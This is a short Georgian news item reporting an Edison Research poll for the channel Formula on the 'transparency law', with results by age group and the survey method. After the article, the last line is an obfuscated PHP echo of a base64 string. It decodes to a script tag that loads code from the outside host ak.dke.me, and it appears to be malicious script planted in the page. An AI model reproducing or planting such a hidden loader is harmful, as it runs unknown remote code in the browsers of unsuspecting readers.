celsiusi
ავერსი საქკაბელი

Edison Research-ის საზოგადოებრივი აზრის გამოკითხვის შედეგებით, კითხვაზე, თქვენი აზრით, რამდენად საჭიროა საქართველოში ქართული ოცნების მიერ ინიციირებული "გამჭვირვალობის კანონი?" - 68% მიიჩნევს, რომ არ არის საჭირო, ხოლო 32% ამბობს, რომ საჭიროა. კვლევის შედეგებს "ფორმულა" ავრცელებს.

მათი ინფორმაციით, ამავე კითხვაზე პასუხი ასაკობრივ ჭრილში ასე არის განაწილებული:

18-24 წლის მოსახლეობა - 82% ამბობს, რომ არ არის საჭირო

24-34 - 74% აცხადებს, რომ არ არის საჭირო

35-44 - 71%-სთვის არ არის საჭირო

45-54 - 66%-სთვის არ არის საჭირო

55-64 - 62% ამბობს, რომ არ არის საჭირო

65+ - 57% ამბობს, რომ არ არის საჭირო

საზოგადოებრივი აზრის გამოკითხვა ტელეკომპანია ფორმულას დაკვეთით ავტორიტეტულმა საერთაშორისო კვლევითმა კომპანიამ Edison Research-მა ჩაატარა.

კვლევის ფარგლებში, პირისპირი გამოკითხვის მეთოდით, ქვეყნის მასშტაბით შემთხვევითი შერჩევით გამოიკითხა საქართველოში მცხოვრები 1 000 საარჩევნო უფლების მქონე 18 წლისა და მეტი ასაკის ადამიანი.

ცდომილება არის +/- 3%, 95%-იანი სანდოობის დონისთვის. საველე სამუშაოები მიმდინარეობდა 16-26 აპრილის შუალედში.

170
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");